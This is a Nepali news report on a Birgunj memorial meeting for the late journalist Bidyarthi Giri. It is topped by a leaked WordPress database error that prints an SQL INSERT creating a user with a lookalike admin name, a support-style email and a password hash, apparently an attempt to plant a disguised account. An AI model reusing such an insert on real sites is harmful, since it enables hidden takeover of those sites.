WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BLqq8X.pAYW07eSZLrTY5hLecMDlZC.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 13:24:47', '', 'admlnlx', 'admlnlx')
प्रदिप मल्ल,
वीरगंज, मंसिर २०–
प्रेस मञ्च नेपाल पर्सा शाखाले वीरगंजका क्रियाशिल एवं स्वतन्त्र पत्रकार स्व.विद्यार्थी गिरीको १२औ दिनको पुण्यतिथिको अवसरमा श्रद्धाञ्जली सभा सम्पन्न गरेको छ ।
गहवा माई मन्दिर पार्कमा सम्पन्न सभामा बोल्दै प्रेस मञ्च नेपालका केन्द्रिय अध्यक्ष सन्तोष पटेलले स्व. गिरीको सम्मानमा हरेक वर्ष कार्यक्रम गरिने बताउदै गिरीको असमायिक निधनले पर्सेली पत्रकारहरुलाई स्तब्ध बनाएको बताउनु भयो । नेपाल पत्रकार महासंघ पर्सा शाखाका पुर्व अध्यक्ष एवं सत्य सन्देश दैनिकका सन्चालक अशोक तिवारीले प्रेस मञ्च नेपाल पर्सा शाखाले वितरण गर्ने ११ हजार रुपैयाँ राशीको पुरस्कार विद्यार्थी गिरी क्रियाशिल पत्रकारिता पुरस्कार आफनो तर्फबाट दिने घोषणा गरे । नेपाल पत्रकार महासंघ पर्साका अध्यक्ष श्याम वन्जाराले स्व. गिरीको परिवारजनलाई महासंघको तर्फबाट सहयोग गर्ने घोषण बताए । नेपाल प्रेस युनियनका केन्द्रिय सदस्य बिजय कुशवाहाले पत्रकारहरुलाई अप्ठ्यारो एवं आपतकालिन अवस्थामा महासंघले ठोस कदम चाल्नुपर्ने र पत्रकारहरुलाई सहयोग पुर्याउने कोष स्थापना गर्नुपर्नेमा जोड दिएका थिए ।
कार्यक्रममा पर्सा जिल्लाका क्रियाशिल संचारकर्मी, संचार उद्यमी, संघसंस्था, राजनितीक दलका नेता एवं नगरबासीको सहभागिता रहेका थियो । पत्रकार गिरीको मंसिर ७ गते मकवानपुरमा टाटासुमो दुर्घटना हुँदा ज्यान गएको थियो ।